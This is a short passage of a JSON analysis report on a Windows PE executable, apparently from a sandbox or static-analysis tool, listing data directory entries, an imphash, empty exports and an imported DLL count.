2786. "virtual_address": "0x00000000",
2787. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2788. "size": "0x00000000"
2789. },
2790. {
2791. "virtual_address": "0x00000000",
2792. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2793. "size": "0x00000000"
2794. }
2795. ],
2796. "exports": [],
2797. "guest_signers": {},
2798. "imphash": "c8503ab5366fc6e13552bba734a2de16",
2799. "icon_fuzzy": null,
2800. "icon": null,
2801. "pdbpath": null,
2802. "imported_dll_count": 34,
2803. "versioninfo": []
2804. }
2805. }